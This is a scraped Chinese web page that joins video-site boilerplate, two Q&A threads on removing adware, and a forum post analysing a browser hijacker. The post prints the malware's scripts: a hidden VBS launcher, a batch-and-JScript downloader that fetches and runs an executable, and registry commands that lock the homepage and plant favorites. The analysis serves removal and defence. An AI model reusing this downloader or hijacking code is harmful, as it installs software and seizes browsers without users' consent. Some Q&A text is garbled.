播放列表加载中...
正在载入...
分享视频：
嵌入代码：
拍下二维码，随时随地看视频
王者插件过侠客登录器视频教程
上 传 者：
内容介绍：
无视侠客登录器更新 无视侠客登录器流氓驱动 无需任何处理工具 无需反复重启
Channel Me 精选
我来说点啥
版权所有 CopyRight
| 京网文[0号 |
| 京公网安备：
互联网药品信息服务资格证：（京）-非经营性- | 广播电视节目制作经营许可证：（京）字第403号
<img src="" width="34" height="34"/>
<img src=""/>
<li data-vid="">
<img src=""/><i data-vid="" class="ckl_plays">
<img width="132" height="99" src=""/>
在线人数：
<li data-vid="">
<img src=""/><i data-vid="" class="ckl_plays">
<img src="///img/blank.png" data-src=""/>
<img src="///img/blank.png" data-src="http://"/>
<li data-vid="" class="cfix">
src="///img/blank.png" data-src=""/>
<i data-vid="" class="ckl_plays">
<li data-vid="" class="cfix">
src="///img/blank.png" data-src=""/><i data-vid="" class="ckl_plays">
没有数据！
{upload_level_name}
粉丝 {fans_count}
{video_count}
{description}恶意插件怎么删除(急需帮助)_百度知道
恶意插件怎么删除(急需帮助)
我电脑恶意插件PCTool恶意插件cnwin广告插件cpush我用瑞星彻底删除用杀马删除 Windows系统现错误进入操作系统......
提问者采纳
清除记住些删除要安全模式才删除啊
相关介绍：
流氓软件：
1：‘流氓软件’介于病毒规软件间软件
2：计算机病毒指：自身具、或使其程序具破坏系统功能、危害用户数据或其恶意行类程序类程序往往影响计算机使用并能够自我复制
3：规软件指：便用户使用计算机工作、娱乐发面向社公发布软件
4：‘流氓软件’介于两者间同具备功能（载、媒体播放等）恶意行（弹广告、门） 给用户带实质危害
流氓软件类：
根据同特征危害困扰广计算机用户流氓软件主要几类：
广告软件（Adware）、间谍软件(Spyware)、浏览器劫持、行记录软件（Track Ware）、恶意共享软件(malicious shareware)等等
流氓软件危害：
1、采用种社技术手段强行或者秘密安装并抵制卸载；
2、强行修改用户软件设置浏览器主页软件自启选项安全选项；强行弹广告或者其干扰用户占用系统资源行；
3、侵害用户信息财产安全潜素或者隐患；
4、未经用户许或者利用用户疏忽,或者利用用户缺乏相关知识秘密收集用户信息、秘密隐私
北京网络行业协公布十流氓软件：
第名：3721网助手（雅虎助手）
第二名：淘宝网
第三名：ebay 易趣
第四名：dudu载加速器
第五名：文网
第六名：青娱乐聊软件（qyule）
第七名：棒秘书
第八名：百度搜霸、百度超级搜霸
第九名：搜工具条
第十名：网络猪、划词搜索
清除使用软件清除：
360安全卫士v3.4标准版
-----启<img class="word-replace" src="/api/getdecpic?picenc=0af0卫士----查杀-----面现都清除掉-----
瑞星卡卡网安全助手 4.0
----启卡卡----查杀恶意及流氓软件-----清除------
超级兔魔设置 V7.99
-----启超级兔----超级兔清理王----清除--------
几种软件都清除流氓用工具建议安全模拟清除完全清除（机按住F8进入）
问题用问发信息给我我帮解决希望采纳
其他类似问题
为您推荐：
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁腾讯真垃圾，流氓软件里带着恶意插件，该都改不掉，投诉没人管_百度知道
腾讯真垃圾，流氓软件里带着恶意插件，该都改不掉，投诉没人管
恶意改我搜索引擎搜都搜搜问问改都改真垃圾
提问者采纳
我winxp系统&IE8浏览器（相同按照彻底删除）第步：参考：我遇腾讯搜搜流氓插件文件夹SSPlus执行程序SOSOUpdate.exe全部删除运行注册表regedit进行应搜索查找删除第二步：删除IE8自带搜索引擎面&搜搜（选默认）能删除权限够所要修改权限运行注册表regeditHKEY_CURRENT_USER\Software\Microsoft\Internet&Explorer\SearchScopes进searchscopes点右键设置权限：勾选完全控制确定再添加删除默认搜索引擎希望帮助
采纳率100%
其他类似问题
为您推荐：
其他4条回答
qq克星360啊装360我qq篡改用360清除插件ok
重装系统 QQ 360 没有一个好鸟
360之父是流氓之祖
误杀经常地事情
你可以 自己删除啊！
电脑安装个QQ和QQ游戏了，其他的最好别装
流氓软件的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁查看: 23155|回复: 32
流氓软件导致主页被篡改成的分析，包括解决方法
看诸君一席话，胜读十年书啊。枉我还自以为电脑操作不在话下了呢。嘿嘿
本帖最后由 b41k3r 于
19:14 编辑
看来我疏忽了,没有仔细看代码中的键值位置,这个键值我也在多个恶意软件中见到过,看来坑爹的360只改了主页的设置,那么如果我们来个逆向思维,按照360的办法,把这个键值也更改权限锁定,是不是就可以防止很多恶意软件更改主页呢？
实验证明,完全可以。
本帖子中包含更多资源
才可以下载或查看，没有帐号？
Error????是权限不够？？？？？&
顶你！不过不是我的板块，不能给你加分了……希望你把锁定键值修改权限的办法编辑你这层楼的帖子公布一下，让大家一起学习&
本帖最后由 苏风臣 于
14:41 编辑
& & 如果您没有闲心看完整篇帖子而仅仅是为了寻求解决方法，请直接看最后
& & 今天老妈用电脑升级个软件，结果带进来个不知什么东西，把我主页给改成了臭名昭著的，开始没在意：改了就改了吧，我再改回来吧。
& & 当然，直接把主页改成about:blank肯定是没戏的，不过我也试了一下：万一好使呢？虽然结果不出所料的不好使。
& & 再看一眼360安全卫士的锁定主页——居然还是空白页！解开锁定再锁定上也没用，这不得不说是360失败的地方……
& & 不过这样也确定了，那就是流氓插件绑定的问题了。这个时候如果去注册表说不定会好使，不过有了360，那就用360清理插件吧，我也懒得自己去找注册表……【附：注册表关于IE主页的键值：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main中的StartPage，直接修改成想要的主页就可以】
& & 清理之后，不出所料有一个差评插件，清理之！之后按照提示重启
& & 可是重启之后发现：NANI?还是不好使？再次清理之！这次就不要重启了，这时发现：主页已经被改回到正常的空白页了，说明360的清理是有效的，可是为什么重启之后又回来了呢？这个时候就可以确定，这家伙在启动项里做了手脚。Win（就是键盘上那个微软的标志，一按会拉开开始菜单的那个按键）+R，输入msconfig，查看启动项：
& & 发现他了！一个叫做kqidong.lnk的启动项，目标指向C:\PROGR~1\qidong\qidong.vbs，这里就要解释一下：如果用过DOS（不是那个CMD批处理，就是DOS系统）的童鞋都会知道，当一个文件夹在电脑中的名字太长时，就会显示为“前几个字母+~+数字编号”的形式，这样目标就确定了：C:\Program Files\qidong\qidong.vbs这个时候其实问题就算是解决了，把这个文件夹C:\Program Files\qidong删除肯定就没问题了，可是拥有求知欲的人永远是蛋疼的，我点了进去：
& & 因为我的电脑设置成了不隐藏系统文件和显示所有文件和文件夹，所以我很轻松的看到了里面所包含的东西：kqidong.zip、qidong.bat、qidong.exe、qidong.vbs、xiazai.bat，其中qidong.exe是winrar 自解压格式，正好我也懒得反编译；我只扫了一眼就确定了：这个东东一定是中国人弄得！（因为用的是汉语拼音……）
先查看那个qidong.vbs，用记事本看看他源码：右键——编辑，发现了里面的内容只有短短三行：
set Cleaner=createobject(&wscript.shell&)
Cleaner.run &qidong.bat&,vbhide
Cleaner.run &xiazai.bat&,vbhide
复制代码
& & 这三行代码的意思仅仅是在隐藏窗体的情况下运行qidong.bat和xiazai.bat两个批处理文件，那再看看这两个的源码吧，先是xiazai.bat，同样右键——编辑：
echo=1/*&nul&@cls
@echo off
call :http &/baiduguangjia/qidong/qidong.exe& &C:\Program Files&\qidong\qidong.exe&
@echo
start && &C:\Program Files&\qidong\qidong.exe
:http
echo Source:& && &&%~1&
echo Destination: &%~f2&
echo Start downloading. . .
cscript -nologo -e:jscript &%~f0& &%~1& &%~2&
echo OK!
goto :eof
*/
var iLocal,iRemote,xPost,sG
iLocal =WScript.Arguments(1);
iRemote = WScript.Arguments(0);
iLocal=iLocal.toLowerCase();
iRemote=iRemote.toLowerCase();
xPost = new ActiveXObject(&Microsoft&+String.fromCharCode(0x2e)+&XMLHTTP&);
xPost.Open(&GET&,iRemote,0);
xPost.Send();
sGet = new ActiveXObject(&ADODB&+String.fromCharCode(0x2e)+&Stream&);
sGet.Mode = 3;
sGet.Type = 1;
sGet.Open();
sGet.Write(xPost.responseBody);
sGet.SaveToFile(iLocal,2);
& & 看不懂？没关系！联系那个文件名和几个网址和地址我们就可以断定：这是用来下载那个自解压文件并解压的，那我们去看看那个自解压文件qidong.exe：右键——用Winrar打开，里面仅仅有着一个qidong.bat，在右面提示着
;下面的注释包含自解压脚本命令
Silent=1
Overwrite=1
复制代码
& & 这里我解释一下：Silent=1是静默状态下解压，不会弹出窗口，而Overwrite=1是如果有同名文件直接替换，保证了不会弹出：“XXX已经存在，是否覆盖”之类的提示来告诉你他在运行。
& & 那么接下来看看qidong.bat，同样“右键——编辑”，可这次就不那么顺利了：里面全是乱码，这怎么办呢？还好我有神器：Notepad++，右键——Edit with Notepad++（UE当然也可以做到同样的事情），这次他就无处躲藏了，请看源码：
%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
cls
::设置主页并锁定
@REG ADD &HKEY_CLASSES_ROOT\CLSID\{871C-1069-A2EA-D}\shell\OpenHomePage\Command& /ve /t REG_EXPAND_SZ /d &C:\Program Files\Internet Explorer\iexplore.exe /?10688& /f& &
@reg add &HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main& /v &Start Page& /d &/?10688& /f& &
::添加快捷方式到收藏夹
@echo off&setlocal enabledelayedexpansion
REG QUERY &HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders& /v Favorites &%Temp%\Favorites.txt
for /f &skip=2 tokens=1,2*& %%i in ('find /i &Favorites& %Temp%\Favorites.txt') do (
echo [InternetShortcut] &&%%k\2345网址导航.url&echo URL=&/?10688& &&%%k\2345网址导航.url&del /f /s /q %Temp%\Favorites.txt&nul
)
@echo off&setlocal enabledelayedexpansion
REG QUERY &HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders& /v Favorites &%Temp%\Favorites.txt
for /f &skip=2 tokens=1,2*& %%i in ('find /i &Favorites& %Temp%\Favorites.txt') do (
echo [InternetShortcut] &&%%k\0什么电影都能搜索-你懂的.url&echo URL=&http://www.ks888.net& &&%%k\0什么电影都能搜索-你懂的.url&del /f /s /q %Temp%\Favorites.txt&nul
)
@echo off&setlocal enabledelayedexpansion
REG QUERY &HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders& /v Favorites &%Temp%\Favorites.txt
for /f &skip=2 tokens=1,2*& %%i in ('find /i &Favorites& %Temp%\Favorites.txt') do (
echo [InternetShortcut] &&%%k\1淘宝热卖.url&echo URL=&/go/chn/tbk_channel/channelcode.php?pid=mm__0&eventid=101329& &&%%k\1淘宝热卖.url&del /f /s /q %Temp%\Favorites.txt&nul
)
复制代码
& & 居然连注释都有……这流氓软件的作者还真可爱，正好也省去了多费口舌解释，这样通过开机启动项里面运行的qidong.vbs，即使文件被360干掉了他也能保证每次开机都重新缠上你，果然是“臭牛氓”！
& & 而那个kqidong.zip中装的就是kqidong.lnk则是最开始启动项里面的那个，直接指向C:\Program Files\qidong\qidong.vbs
& & 至此我们已经完整的掌握了这个万恶的的流氓团伙的信息，可以直接干掉他了！
& & 通过随便一个清理插件的工具清理掉插件、之后打开msconfig，ban掉kqidong.lnk这个启动项，再把C盘Program Files下的qidong文件夹删除，这个臭牛氓就被彻底的请出电脑了！不过记得最后一步：把主页改回来，最好去上面给出了注册表项里面查看一下Startpage，是不是已经改过来了，如果没改过来就处理一下吧。
支持原创！（解决问题并分析，值得学习！）.
本帖最后由 苏风臣 于
18:51 编辑
b41k3r 发表于
一个疑问:据我所知,360锁定主页的原理好像是更改HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ ...
他是通过注册表改变了你访问桌面上那个微软给你的那个IE的快捷方式（尽管他没有快捷方式的箭头，他也是个快捷方式），让他直接指向了这个网址，但是事实上你的主页并没有被修改。相信很多人中了流氓软件后都有过这样的经历：就是哪怕在Internet选项里面显示的主页是自己选定的主页，但当我们打开IE，第一个打开的依旧是被篡改过的网页
那么我们做个实验：在C:\Program Files\Internet Explorer找到iexplorer.exe，给他创建一个快捷方式然后右键——属性，在“目标”一栏的引号后面加上一个空格，输入，确定之后打开这个快捷方式，我们就直接打开了百度。而这个和你的主页是什么无关。想象一下，当这样一个快捷方式变成你取代了你常用的快捷方式，以后只要一打开浏览器就显示百度，你以后会不会就认为百度是你的首页了呢？
而第四行代码就是通过一个类似的过程，只不过他是通过注册表修改了最原始的那个没有快捷方式箭头的快捷方式，让你桌面上的那个IE指向他的网站，而当我们习惯性的打开桌面的IE图标第一个打开的网站通常都会认为他就是主页，虽然实际上，你的电脑主页根本就不是他，因为我们如果打开C:\Program Files\Internet Explorer下的iexplorer.exe时打开的就不是这个网址了
至于你说的用注册表编辑器无法写入键值……抱歉，我刚刚实验了一下，我依然可以改变键值，360没敢拦我，没有遇到您说的那种情况
这个给力，谢谢楼主分享
一个疑问:据我所知,360锁定主页的原理好像是更改HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main注册表项的权限,使得除SYSTEM以外的用户都只具有只读权,锁定后用注册表编辑器将无法写入键值,不知这个恶意程序是如何突破这个限制的,从源代码中也没有看到相关代码。
如下:03.::设置主页并锁定
04.@REG ADD &HKEY_CLASSES_ROOT\CLSID\{871C-1069-A2EA-D}\shell\OpenHomePage\Command& /ve /t REG_EXPAND_SZ /d &C:\Program Files\Internet Explorer\iexplore.exe /?10688& /f& &
05.@reg add &HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main& /v &Start Page& /d &/?10688& /f& &
复制代码这些代码只是修改主页,并无其他功能。
不过2345的广告很雷人的
我可以不追究你广告的问题，但是我不能容忍你不看帖子就回复啊!就是在360解决无果的情况下我才亲自上阵来处理的，360要是能做到的话我就省事儿了&
华夏青春 发表于
苏叔，你老人家竟然用360...应该不是360杀软吧。2345主页等于流氓团队？
SP：你身为黑客，竟然不教教你老 ...
我有你那么大……是你没我那么大！反正别叫叔，和别人一样叫苏兄就可以了
我从来不觉得360有什么问题，凭心而论这是个好软件，为很多小白提供了防护和维护自己电脑的简便方法。再说现在很多防火墙还是黑客做的呢，而且熊猫烧香的专杀也是武汉男生自己做的。
俗话说“英雄不问出处，流氓别问岁数”（后一句自动过滤），关键不是他干过什么，而是他正在干什么。现在360的确给了很多人很大的方便，还是个免费软件，而且并没有什么危害，那么在你超过了他、可以拿出比他更好的软件之前，没有任何理由去否定甚至贬低他。如果不喜欢就不用他就得了
另外，一切的工具都得看使用者，像这个东西因为用到了错误的方法，于是乎我们认为他是流氓软件，要删除他，事实上那个xiazai.bat里面的东西完全可以用作一个软件的自动更新上，但是当使用者让它更新流氓软件的时候，它也就成了流氓
好的安全工程师一定是个好黑客，这点是大家都承认的。PS：我总觉得酥胸是个很神奇的东西，哈哈，开玩笑。&
我很疑问哈，加入开机启动项360不会提示吗？我没用360.我不知道啊，求告知&
同意，要不是360，现在很多人的电脑根本就是完全不设防的，全是漏洞木马。杀毒虽有些欠缺，但它也一直在进步，从特征码到云查杀，引擎几次更换.&
苏兄...事实上我也挺支持小周的.是他带领这全国杀软的免费......另外说,管家比360好,,我郁闷.老马抄袭是个好手.管家主要是利用了诱惑,QQ加速的诱惑&
其实，使用金山更简单，它会自动删掉这个批处理，就算删不掉，它也会强行绑定到指定主页（谁叫金山曾经是这方面的大佬）。&
谢谢分享！领教了
Powered by